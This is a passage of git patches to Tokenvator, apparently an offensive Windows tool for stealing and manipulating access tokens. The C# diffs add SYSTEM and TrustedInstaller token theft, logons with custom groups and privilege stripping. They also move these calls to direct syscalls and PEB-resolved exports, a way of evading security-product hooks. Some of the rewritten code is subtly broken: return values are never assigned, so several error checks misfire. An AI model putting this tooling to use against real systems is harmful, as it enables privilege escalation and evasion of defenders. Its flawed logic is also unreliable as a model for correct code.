+                Console.WriteLine("[-] {0}", ex.Message);
+                return;
+            }
+
+            if (0 != ntRetVal)
+            {
+                Misc.GetNtError("NtQueryInformationToken", ntRetVal);
                 return;
             }
             Console.WriteLine("[*] GetTokenInformation - Pass 2");
+
             Winnt._TOKEN_PRIVILEGES_ARRAY tokenPrivileges = (Winnt._TOKEN_PRIVILEGES_ARRAY)Marshal.PtrToStructure(lpTokenInformation, typeof(Winnt._TOKEN_PRIVILEGES_ARRAY));
             Marshal.FreeHGlobal(lpTokenInformation);
+
             Console.WriteLine("[+] Enumerated {0} Privileges", tokenPrivileges.PrivilegeCount);
             Console.WriteLine();
             Console.WriteLine("{0,-45}{1,-30}", "Privilege Name", "Enabled");
             Console.WriteLine("{0,-45}{1,-30}", "--------------", "-------");
+            #endregion
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // Iterate through the privileges on the token
             ////////////////////////////////////////////////////////////////////////////////
             for (int i = 0; i < tokenPrivileges.PrivilegeCount; i++)
             {
                 StringBuilder lpName = new StringBuilder();
-                int cchName = 0;
+                uint cchName = 0;
                 IntPtr lpLuid = Marshal.AllocHGlobal(Marshal.SizeOf(tokenPrivileges.Privileges[i]));
                 Marshal.StructureToPtr(tokenPrivileges.Privileges[i].Luid, lpLuid, true);
 
-                advapi32.LookupPrivilegeName(null, lpLuid, null, ref cchName);
+                ////////////////////////////////////////////////////////////////////////////////
+                // advapi32.LookupPrivilegeName(null, lpLuid, null, ref cchName);
+                // advapi32.LookupPrivilegeName(null, lpLuid, lpName, ref cchName)
+                ////////////////////////////////////////////////////////////////////////////////
+
+                try
+                {
+                    fLookupPrivilegeNameW(null, lpLuid, null, ref cchName);
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine("[-] LookupPrivilegeNameW Generated an Exception");
+                    Console.WriteLine("[-] {0}", ex.Message);
+                    return;
+                }
+
                 if (cchName <= 0 || cchName > int.MaxValue)
                 {
                     Misc.GetWin32Error("LookupPrivilegeName Pass 1");
@@ -124,8 +179,20 @@ public void DisableAndRemoveAllTokenPrivileges()
                     continue;
                 }
 
-                lpName.EnsureCapacity(cchName + 1);
-                if (!advapi32.LookupPrivilegeName(null, lpLuid, lpName, ref cchName))
+                lpName.EnsureCapacity((int)cchName + 1);
+                bool retVal = false;
+                try
+                {
+                    retVal = fLookupPrivilegeNameW(null, lpLuid, lpName, ref cchName);
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine("[-] LookupPrivilegeNameW Generated an Exception");
+                    Console.WriteLine("[-] {0}", ex.Message);
+                    return;
+                }
+
+                if (!retVal)
                 {
                     Misc.GetWin32Error("LookupPrivilegeName Pass 2");
                     Marshal.FreeHGlobal(lpLuid);
@@ -139,13 +206,31 @@ public void DisableAndRemoveAllTokenPrivileges()
                     Privilege = new Winnt._LUID_AND_ATTRIBUTES[] { tokenPrivileges.Privileges[i] }
                 };
 
+                ////////////////////////////////////////////////////////////////////////////////
+                // This seem unessessary
+                // advapi32.PrivilegeCheck(hExistingToken, ref privilegeSet, out pfResult)
+                ////////////////////////////////////////////////////////////////////////////////
+                /*
+                try
+                {
+                    fSyscallNtPrivilegeCheck(hWorkingToken, ref privilegeSet, ref )
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine("[-] LookupPrivilegeNameW Generated an Exception");
+                    Console.WriteLine("[-] {0}", ex.Message);
+                    return;
+                }
+                */
                 int pfResult = 0;
+                /*
                 if (!advapi32.PrivilegeCheck(hExistingToken, ref privilegeSet, out pfResult))
                 {
                     Misc.GetWin32Error("PrivilegeCheck");
                     Marshal.FreeHGlobal(lpLuid);
                     continue;
                 }
+                */
                 if (Convert.ToBoolean(pfResult))
                 {
                     SetTokenPrivilege(lpName.ToString(), Winnt.TokenPrivileges.SE_PRIVILEGE_NONE);
@@ -166,11 +251,19 @@ public void DisableAndRemoveAllTokenPrivileges()
         ////////////////////////////////////////////////////////////////////////////////
         public bool GetSystem(string newProcess)
         {
-            SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.LocalSystemSid, null);
-            NTAccount systemAccount = (NTAccount)securityIdentifier.Translate(typeof(NTAccount));
+            try
+            {
+                SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.LocalSystemSid, null);
+                NTAccount systemAccount = (NTAccount)securityIdentifier.Translate(typeof(NTAccount));
 
-            Console.WriteLine("[*] Searching for {0}", systemAccount.ToString());
-            processes = UserSessions.EnumerateUserProcesses(false, systemAccount.ToString());
+                Console.WriteLine("[*] Searching for {0}", systemAccount.ToString());
+                processes = UserSessions.EnumerateUserProcesses(false, systemAccount.ToString());
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine(ex.Message);
+                return false;
+            }
 
             foreach (uint process in processes.Keys)
             {
@@ -204,11 +297,19 @@ public bool GetSystem(string newProcess)
         ////////////////////////////////////////////////////////////////////////////////
         public bool GetSystem()
         {
-            SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.LocalSystemSid, null);
-            NTAccount systemAccount = (NTAccount)securityIdentifier.Translate(typeof(NTAccount));
+            try
+            {
+                SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.LocalSystemSid, null);
+                NTAccount systemAccount = (NTAccount)securityIdentifier.Translate(typeof(NTAccount));
 
-            Console.WriteLine("[*] Searching for {0}", systemAccount.ToString());
-            processes = UserSessions.EnumerateUserProcesses(false, systemAccount.ToString());
+                Console.WriteLine("[*] Searching for {0}", systemAccount.ToString());
+                processes = UserSessions.EnumerateUserProcesses(false, systemAccount.ToString());
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine(ex.Message);
+                return false;
+            }
 
             foreach (uint process in processes.Keys)
             {
@@ -229,7 +330,8 @@ public bool GetSystem()
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// Start a process as SYSTEM w/ Trusted Installer Group
+        /// Impersonates a SYSTEM token w/ Trusted Installer Group by starting  
+        /// the TrustedInstaller service and starting a process with it's token
         /// No conversions required
         /// </summary>
         /// <returns></returns>
@@ -273,7 +375,8 @@ public bool GetTrustedInstaller(string newProcess)
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// Impersonates a SYSTEM token w/ Trusted Installer Group
+        /// Impersonates a SYSTEM token w/ Trusted Installer Group by starting  
+        /// the TrustedInstaller service and stealing it token
         /// No conversions required
         /// </summary>
         /// <returns></returns>
@@ -307,14 +410,45 @@ public bool GetTrustedInstaller()
         #endregion
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Should be a simple conversion
-        // Combine with lower function
+        /// <summary>
+        /// Logs on a user to create a new token for that user
+        /// Useful for impersonating NetworkService or LocalService
+        /// </summary>
+        /// <param name="domain"></param>
+        /// <param name="username"></param>
+        /// <param name="password"></param>
+        /// <param name="logonType"></param>
+        /// <param name="command"></param>
+        /// <param name="arguments"></param>
         ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public void LogonUser(string domain, string username, string password, Winbase.LOGON_TYPE logonType, string command, string arguments)
         {
-            if (!advapi32.LogonUser(username, domain, password, logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, out hExistingToken))
+            ////////////////////////////////////////////////////////////////////////////////
+            // Call LogonUser - this will trigger a logon event, but is sometimes the better than the alternative
+            // advapi32.LogonUser(username, domain, password, logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, out hExistingToken)
+            ////////////////////////////////////////////////////////////////////////////////
+
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            IntPtr hLogonUserW = Generic.GetExportAddress(hadvapi32, "LogonUserW");
+            MonkeyWorks.advapi32.LogonUserW fLLogonUserW = (MonkeyWorks.advapi32.LogonUserW)Marshal.GetDelegateForFunctionPointer(hLogonUserW, typeof(MonkeyWorks.advapi32.LogonUserW));
+
+            bool retVal = false;
+            try
+            {
+                fLLogonUserW(username, domain, password, logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, out hExistingToken);
+            }
+            catch(Exception ex)
+            {
+                Console.WriteLine("[-] LogonUserW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return;
+            }
+
+            if (!retVal)
             {
-                Misc.GetWin32Error("LogonUser");
+                Misc.GetWin32Error("LogonUserW");
                 return;
             }
             Console.WriteLine("[+] Logged On {0}", username.TrimEnd());
@@ -334,21 +468,42 @@ public void LogonUser(string domain, string username, string password, Winbase.L
             }
             else
             {
+                //This should probably be handled in class
                 Create createProcess;
                 if (0 == Process.GetCurrentProcess().SessionId)
+                {
                     createProcess = CreateProcess.CreateProcessWithLogonW;
+                }
                 else
+                {
                     createProcess = CreateProcess.CreateProcessWithTokenW;
+                }
 
                 createProcess(hExistingToken, command, arguments);
             }
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Combine with above method
+        /// <summary>
+        /// Logs on a user to create a new token for that user with custom groups
+        /// Useful for doing things like getting trustedinstaller
+        /// </summary>
+        /// <param name="domain"></param>
+        /// <param name="username"></param>
+        /// <param name="password"></param>
+        /// <param name="groups"></param>
+        /// <param name="logonType"></param>
+        /// <param name="command"></param>
+        /// <param name="arguments"></param>
         ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public void LogonUser(string domain, string username, string password, string groups, Winbase.LOGON_TYPE logonType, string command, string arguments)
         {
+            ////////////////////////////////////////////////////////////////////////////////
+            // Create the token groups structure
+            ////////////////////////////////////////////////////////////////////////////////
+            
             SetWorkingTokenToSelf();
 
             Ntifs._TOKEN_GROUPS tokenGroups;
@@ -358,13 +513,28 @@ public void LogonUser(string domain, string username, string password, string gr
                 ct.CreateTokenGroups(domain, username, out tokenGroups, out tokenPrimaryGroup, groups.Split(','));
             }
 
-            if (!advapi32.LogonUserExExW(
-                username, domain, password, 
-                logonType, 
-                Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, 
-                ref tokenGroups, 
-                out hExistingToken, 
-                IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero))
+            ////////////////////////////////////////////////////////////////////////////////
+            // Call LogonUserExExW which allows us to manually specify the groups
+            // advapi32.LogonUserExExW(username, domain, password, logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, ref tokenGroups, out hExistingToken, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero)
+            ////////////////////////////////////////////////////////////////////////////////
+
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            IntPtr hLogonUserExExW = Generic.GetExportAddress(hadvapi32, "LogonUserExExW");
+            MonkeyWorks.advapi32.LogonUserExExW fLLogonUserW = (MonkeyWorks.advapi32.LogonUserExExW)Marshal.GetDelegateForFunctionPointer(hLogonUserExExW, typeof(MonkeyWorks.advapi32.LogonUserExExW));
+
+            bool retVal = false;
+            try
+            {
+                fLLogonUserW(username, domain, password, logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, ref tokenGroups, out hExistingToken, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
+            }
+            catch(Exception ex)
+            {
+                Console.WriteLine("[-] LogonUserExExW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return;
+            }
+
+            if (!retVal)
             {
                 Misc.GetWin32Error("LogonUserExExW");
                 return;
@@ -373,6 +543,7 @@ public void LogonUser(string domain, string username, string password, string gr
 
             if (Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE == logonType)
             {
+                //Is this needed?
                 SetWorkingTokenToRemote();
                 if (!SetTokenSessionId(Process.GetCurrentProcess().SessionId))
                 {
@@ -403,73 +574,52 @@ public void LogonUser(string domain, string username, string password, string gr
             }
         }
 
-        ////////////////////////////////////////////////////////////////////////////////
         // Can be use to remove groups, adding groups would require a new token 
-        // Next Release 
-        // Change Mainloop.Modules method name
         //https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokengroups
-        ////////////////////////////////////////////////////////////////////////////////
-        public void SetTokenGroup(string group, bool isSID)
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        public void DisableTokenGroup(string group)
         {
-            var tokenGroups = new Ntifs._TOKEN_GROUPS();
-            tokenGroups.Initialize();
-
-            if (!DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation))
-            {
-                return;
-            }
-            SetWorkingTokenToNewToken();
-
             TokenInformation ti = new TokenInformation(hWorkingToken);
             ti.GetTokenGroups();
-            for (int i = 0; i < ti.tokenGroups.GroupCount; i++)
-            {
-                tokenGroups.Groups[i].Sid = ti.tokenGroups.Groups[i].Sid;
-                tokenGroups.Groups[i].Attributes = ti.tokenGroups.Groups[i].Attributes;
-                Console.WriteLine(tokenGroups.Groups[i].Sid);
-            }
-            tokenGroups.GroupCount = ti.tokenGroups.GroupCount;
+            
+
+            IntPtr hNtAdjustGroupsToken = Generic.GetSyscallStub("NtAdjustGroupsToken");
+            MonkeyWorks.ntdll.NtAdjustGroupsToken fSyscallNtAdjustGroupsToken = (MonkeyWorks.ntdll.NtAdjustGroupsToken)Marshal.GetDelegateForFunctionPointer(hNtAdjustGroupsToken, typeof(MonkeyWorks.ntdll.NtAdjustGroupsToken));
 
-            if (!isSID)
+            string sid, account;
+            for (int i = 0; i < ti.tokenGroups.GroupCount; i++) 
             {
-                Console.WriteLine("Group:     {0}", group);
-                string domain = Environment.MachineName;
-                if (group.Contains(@"\"))
+                TokenInformation.ReadSidAndName(ti.tokenGroups.Groups[i].Sid, out sid, out account);
+                if (string.Equals(group, account, StringComparison.OrdinalIgnoreCase))
                 {
-                    string[] split = group.Split('\\');
-                    domain = split[0];
-                    group = split[1];
+                    ti.tokenGroups.Groups[i].Attributes ^= (uint)Winnt.SE_GROUP_ENABLED;
+                    break;
                 }
-                group = new NTAccount(domain, group).Translate(typeof(SecurityIdentifier)).Value;
             }
-            Console.WriteLine("Group SID: {0}", group);
-            ++tokenGroups.GroupCount;
 
-            if (!CreateTokens.InitializeSid("S-1-5-21-258464558-1780981397-2849438727-1010", ref tokenGroups.Groups[tokenGroups.GroupCount].Sid))
+            ulong groupSize = (ulong)Marshal.SizeOf(ti.tokenGroups);
+
+            uint ntRetVal = 0;
+            try
+            {
+                ntRetVal = fSyscallNtAdjustGroupsToken(hWorkingToken, false, ref ti.tokenGroups, groupSize, ref ti.tokenGroups, ref groupSize);
+            }
+            catch (Exception ex)
             {
+                Console.WriteLine("[-] NtAdjustGroupsToken Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
                 return;
             }
-            tokenGroups.Groups[tokenGroups.GroupCount].Attributes = (uint)Winnt.SE_GROUP_ENABLED;
-            CreateTokens ct = new CreateTokens(hWorkingToken);
-
-            string userName = WindowsIdentity.GetCurrent().Name;
-            userName = userName.Split('\\')[1];
 
-            //ct.CreateTokenGroups(userName, out Ntifs._TOKEN_GROUPS tg, out Winnt._TOKEN_PRIMARY_GROUP tpg);
+            Console.WriteLine("[*] Group no longer enabled");
 
-            tokenGroups = ti.tokenGroups;
-
-            uint returnLength;
-            if (!advapi32.AdjustTokenGroups(hWorkingToken, false, ref tokenGroups, (uint)Marshal.SizeOf(tokenGroups), ref ti.tokenGroups, out returnLength))
+            if (0 != ntRetVal)
             {
-                Misc.GetWin32Error("AdjustTokenGroups");
+                Misc.GetNtError("NtAdjustGroupsToken", ntRetVal);
                 return;
             }
 
-            ti.GetTokenGroups();
-            ti.Dispose();
-
-            Console.WriteLine(returnLength);
         }
 
         ////////////////////////////////////////////////////////////////////////////////
@@ -496,25 +646,62 @@ public void SetThreadTokenPrivilege(string privilege, Winnt.TokenPrivileges attr
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Sets a Token to have a specified privilege
-        // http://www.leeholmes.com/blog/2010/09/24/adjusting-token-privileges-in-powershell/
-        // https://support.microsoft.com/en-us/help/131065/how-to-obtain-a-handle-to-any-process-with-sedebugprivilege
-        //
-        // This will be a fun conversion
+        /// <summary>
+        /// Adjusts the state of a privilege on a Token
+        /// http://www.leeholmes.com/blog/2010/09/24/adjusting-token-privileges-in-powershell/
+        /// https://support.microsoft.com/en-us/help/131065/how-to-obtain-a-handle-to-any-process-with-sedebugprivilege
+        /// Converted to a mix of D/Invoke Syscalls and GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="privilege"></param>
+        /// <param name="attribute"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public bool SetTokenPrivilege(string privilege, Winnt.TokenPrivileges attribute)
         {
             Console.WriteLine("[*] Adjusting Token Privilege {0} => {1}", privilege, attribute);
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // Retrieves the LUID for the name of a specified privilege
+            // advapi32.LookupPrivilegeValue(null, privilege, ref luid)
             ////////////////////////////////////////////////////////////////////////////////
+            
+            #region LookupPrivilegeValueW
             Winnt._LUID luid = new Winnt._LUID();
-            if (!advapi32.LookupPrivilegeValue(null, privilege, ref luid))
+
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            IntPtr hLookupPrivilegeValueW = Generic.GetExportAddress(hadvapi32, "LookupPrivilegeValueW");
+            MonkeyWorks.advapi32.LookupPrivilegeValueW fLookupPrivilegeValueW = (MonkeyWorks.advapi32.LookupPrivilegeValueW)Marshal.GetDelegateForFunctionPointer(hLookupPrivilegeValueW, typeof(MonkeyWorks.advapi32.LookupPrivilegeValueW));
+
+            bool retVal = false;
+            try
+            {
+                retVal = fLookupPrivilegeValueW(string.Empty, privilege, ref luid);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] LookupPrivilegeValueW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+
+            if (!retVal)
             {
-                Misc.GetWin32Error("LookupPrivilegeValue");
+                Misc.GetWin32Error("LookupPrivilegeValueW");
                 return false;
             }
             Console.WriteLine(" [+] Recieved luid");
+            #endregion
 
             ////////////////////////////////////////////////////////////////////////////////
+            // Adjust the token privileges to hWorkingToken
+            // advapi32.AdjustTokenPrivileges(hWorkingToken, false, ref newState, (uint)Marshal.SizeOf(newState), ref previousState, out returnLength)
+            ////////////////////////////////////////////////////////////////////////////////
+
+            #region AdjustTokenPrivilege
+            Console.WriteLine(" [*] AdjustTokenPrivilege");
+
             Winnt._LUID_AND_ATTRIBUTES luidAndAttributes = new Winnt._LUID_AND_ATTRIBUTES
             {
                 Luid = luid,
@@ -526,24 +713,46 @@ public bool SetTokenPrivilege(string privilege, Winnt.TokenPrivileges attribute)
                 Privileges = luidAndAttributes
             };
             Winnt._TOKEN_PRIVILEGES previousState = new Winnt._TOKEN_PRIVILEGES();
-            Console.WriteLine(" [*] AdjustTokenPrivilege");
-            uint returnLength;
-            if (!advapi32.AdjustTokenPrivileges(hWorkingToken, false, ref newState, (uint)Marshal.SizeOf(newState), ref previousState, out returnLength))
+            
+            ulong returnLength = 0;
+
+            IntPtr hNtAdjustPrivilegesToken = Generic.GetSyscallStub("NtAdjustPrivilegesToken");
+            MonkeyWorks.ntdll.NtAdjustPrivilegesToken fSyscallNtAdjustPrivilegesToken = (MonkeyWorks.ntdll.NtAdjustPrivilegesToken)Marshal.GetDelegateForFunctionPointer(hNtAdjustPrivilegesToken, typeof(MonkeyWorks.ntdll.NtAdjustPrivilegesToken));
+
+            uint ntRetVal = 0;
+            try
+            {
+                fSyscallNtAdjustPrivilegesToken(hWorkingToken, false, ref newState, (uint)Marshal.SizeOf(newState), ref previousState, ref returnLength);
+            }
+            catch(Exception ex)
             {
-                Misc.GetWin32Error("AdjustTokenPrivileges");
+                Console.WriteLine("[-] NtAdjustPrivilegesToken Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
                 return false;
             }
 
+            if (0 != ntRetVal)
+            {
+                Misc.GetNtError("NtAdjustPrivilegesToken", ntRetVal);
+                return false;
+            }
+            #endregion
+
             Console.WriteLine(" [+] Adjusted Privilege: {0}", privilege);
             Console.WriteLine(" [+] Privilege State: {0}", attribute);
             return true;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Updates the token session ID to the specified session
-        // Does this even work?
-        // Convert to syscalls
+        /// <summary>
+        /// Updates the token session ID to the specified session
+        /// Does this even work?
+        /// </summary>
+        /// <param name="sessionId"></param>
+        /// <returns>Return true if completed without error</returns>
         ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public bool SetTokenSessionId(int sessionId)
         {
             bool exists, enabled;
@@ -569,30 +778,41 @@ public bool SetTokenSessionId(int sessionId)
 
             Console.WriteLine("[*] Updating Token Session ID to {0}", sessionId);
 
+            ////////////////////////////////////////////////////////////////////////////////
+            // Update the token information to the current Session ID
+            // advapi32.SetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenSessionId, handle.AddrOfPinnedObject(), sizeof(uint));
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            IntPtr hSetTokenInformation = Generic.GetExportAddress(hadvapi32, "SetTokenInformation");
+            MonkeyWorks.advapi32.SetTokenInformation fSetTokenInformation = (MonkeyWorks.advapi32.SetTokenInformation)Marshal.GetDelegateForFunctionPointer(hSetTokenInformation, typeof(MonkeyWorks.advapi32.SetTokenInformation));
+
             GCHandle handle = new GCHandle();
+            handle = GCHandle.Alloc(sessionId, GCHandleType.Pinned);
+            bool retVal = false;
             try
             {
-                handle = GCHandle.Alloc(sessionId, GCHandleType.Pinned);
-                if (!advapi32.SetTokenInformation(
-                    hWorkingToken,
-                    Winnt._TOKEN_INFORMATION_CLASS.TokenSessionId,
-                    handle.AddrOfPinnedObject(),
-                    sizeof(uint))
-                )
-                {
-                    Misc.GetWin32Error("SetTokenInformation");
-                    return false;
-                }
+                retVal = fSetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenSessionId, handle.AddrOfPinnedObject(), sizeof(uint));
             }
             catch (Exception ex)
             {
-                Console.WriteLine(ex.Message);
+                Console.WriteLine("[-] NtAdjustPrivilegesToken Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
             }
             finally
             {
                 if (null != handle && handle.IsAllocated)
+                {
                     handle.Free();
+                }
             }
+
+            if (!retVal)
+            {
+                Misc.GetWin32Error("SetTokenInformation");
+                return false;
+            }
+
             return true;
         }
     }

From d38ad197a7d9af8af12836847f688fdb4acd7504 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Mon, 30 Aug 2021 10:26:24 -0500
Subject: [PATCH 11/36] Removing DisableAndRemoveAllTokenPrivileges and
 Privileges Lists

DisableAndRemoveAllTokenPrivileges was almost entirely redundent with other functionality. Now self contained in MainLoop.Modules. Privileges List was redundent with CommandLineParsing Privileges and used in fewer places.
---
 Tokenvator/MainLoop.Modules.cs                |  38 +++-
 .../Plugins/AccessTokens/AccessTokens.cs      |  11 +-
 .../Plugins/AccessTokens/TokenInformation.cs  |  20 +-
 .../Plugins/AccessTokens/TokenManipulation.cs | 209 ++----------------
 Tokenvator/Resources/CommandLineParsing.cs    |   9 +-
 Tokenvator/Resources/TabComplete.cs           |   2 +-
 6 files changed, 78 insertions(+), 211 deletions(-)

diff --git a/Tokenvator/MainLoop.Modules.cs b/Tokenvator/MainLoop.Modules.cs
index cbcf7af..7cc71e7 100644
--- a/Tokenvator/MainLoop.Modules.cs
+++ b/Tokenvator/MainLoop.Modules.cs
@@ -398,7 +398,7 @@ private static void _Info(CommandLineParsing cLP, IntPtr hToken)
                     t.SetWorkingTokenToSelf();
                 }
 
-                hToken = t.GetWorkingToken();
+                //hToken = t.GetWorkingToken();
 
                 Console.WriteLine("[*] Primary Token");
                 t.GetTokenUser();
@@ -705,22 +705,46 @@ private static void _LogonUser(CommandLineParsing cLP, IntPtr hToken)
         ////////////////////////////////////////////////////////////////////////////////
         private static void _NukePrivileges(CommandLineParsing cLP, IntPtr hToken)
         {
-            using (TokenManipulation t = new TokenManipulation(hToken))
+            using (TokenInformation ti = new TokenInformation(hToken))
             {
                 if (cLP.Remote)
                 {
-                    t.SetWorkingTokenToRemote();
-                    if (!t.OpenProcessToken(cLP.ProcessID))
+                    if (!ti.OpenProcessToken(cLP.ProcessID))
                     {
                         return;
                     }
+                    ti.SetWorkingTokenToRemote();
                 }
                 else
                 {
-                    t.SetWorkingTokenToSelf();
+                    ti.SetWorkingTokenToSelf();
+                }
+
+                ti.GetTokenPrivileges();
+                using (TokenManipulation tm = new TokenManipulation(ti.GetWorkingToken()))
+                {
+                    tm.SetWorkingTokenToSelf();
+
+                    foreach (string privilege in ti.Privileges)
+                    {
+                        int index = CommandLineParsing.Privileges.FindIndex(x => x.Equals(privilege, StringComparison.OrdinalIgnoreCase));
+                        if (-1 != index)
+                        {
+                            if (!tm.SetTokenPrivilege(CommandLineParsing.Privileges[index], Winnt.TokenPrivileges.SE_PRIVILEGE_REMOVED))
+                            {
+                                tm.SetTokenPrivilege(CommandLineParsing.Privileges[index], Winnt.TokenPrivileges.SE_PRIVILEGE_NONE);
+                            }
+                        }
+                        else
+                        {
+                            Console.WriteLine("[-] Privilege \"{0}\" not indexed", privilege);
+                            Console.WriteLine("[-] A bug report would be appreciated");
+                        }
+                        Thread.Sleep(1000);
+                    }
                 }
 
-                t.DisableAndRemoveAllTokenPrivileges();
+                ti.GetTokenPrivileges();
             }
         }
 
@@ -1223,7 +1247,7 @@ private static void _HelpItem(string input)
         {
             if ("privileges" == input.ToLower())
             {
-                foreach (string item in TokenManipulation.validPrivileges)
+                foreach (string item in CommandLineParsing.Privileges)
                 {
                     Console.WriteLine(item);
                 }
diff --git a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
index 4898c2d..cdc295c 100644
--- a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
@@ -532,6 +532,7 @@ protected bool CloseHandle(IntPtr handle)
                 {
                     Console.WriteLine("[-] NtCloseHandle Generated an Exception");
                     Console.WriteLine("[-] {0}", ex.Message);
+                    Console.WriteLine("[-] {0}",  (new StackTrace()).GetFrame(1).GetMethod().Name);
                     return false;
                 }
                 return true;
@@ -540,6 +541,7 @@ protected bool CloseHandle(IntPtr handle)
             if (0 != ntRetVal)
             {
                 Misc.GetNtError("NtClose", ntRetVal);
+                Console.WriteLine("[-] {0}", (new StackTrace()).GetFrame(1).GetMethod().Name);
                 return false;
             }
             return true;
@@ -567,19 +569,26 @@ protected bool CloseHandle(IntPtr handle)
         public virtual void Dispose()
         {
             if (IntPtr.Zero != phNewToken)
-            {                    
+            {
+                //Console.WriteLine("phNewToken");
                 CloseHandle(phNewToken);
             }
             if (IntPtr.Zero != hExistingToken)
             {
+                //Console.WriteLine("hExistingToken");
                 CloseHandle(hExistingToken);
             }
+            /*
+            This should be covered by the other closed handles
             if (IntPtr.Zero != hWorkingToken && currentProcessToken != hWorkingToken)
             {
+                Console.WriteLine("hWorkingToken");
                 CloseHandle(hWorkingToken);
             }
+            */
             if (IntPtr.Zero != hWorkingThreadToken)
             {
+                //Console.WriteLine("hWorkingThreadToken");
                 CloseHandle(hWorkingThreadToken);
             }
 
diff --git a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
index ad4bc91..4720c9a 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
@@ -1,4 +1,5 @@
 using System;
+using System.Collections.Generic;
 using System.Runtime.ExceptionServices;
 using System.Runtime.InteropServices;
 using System.Security;
@@ -10,6 +11,7 @@
 using Tokenvator.Resources;
 
 using MonkeyWorks.Unmanaged.Headers;
+
 //using MonkeyWorks.Unmanaged.Libraries;
 
 namespace Tokenvator.Plugins.AccessTokens
@@ -38,6 +40,8 @@ class TokenInformation : AccessTokens
         public IntPtr hTokenElevationType;
         public IntPtr hTokenType;
 
+        public List<string> Privileges { get; private set; }
+
         private readonly IntPtr hNtQueryInformationToken;
 
         ////////////////////////////////////////////////////////////////////////////////
@@ -49,6 +53,8 @@ class TokenInformation : AccessTokens
         public TokenInformation(IntPtr hToken) : base(hToken)
         {
             hNtQueryInformationToken = Generic.GetSyscallStub("NtQueryInformationToken");
+
+            Privileges = new List<string>();
         }
 
         ////////////////////////////////////////////////////////////////////////////////
@@ -404,8 +410,8 @@ public void GetTokenPrivileges()
             ////////////////////////////////////////////////////////////////////////////////
             IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
 
-            IntPtr hLookupPrivilegeName = Generic.GetExportAddress(hadvapi32, "LookupPrivilegeNameW");
-            MonkeyWorks.advapi32.LookupPrivilegeNameW fLookupPrivilegeName = (MonkeyWorks.advapi32.LookupPrivilegeNameW)Marshal.GetDelegateForFunctionPointer(hLookupPrivilegeName, typeof(MonkeyWorks.advapi32.LookupPrivilegeNameW));
+            IntPtr hLookupPrivilegeNameW = Generic.GetExportAddress(hadvapi32, "LookupPrivilegeNameW");
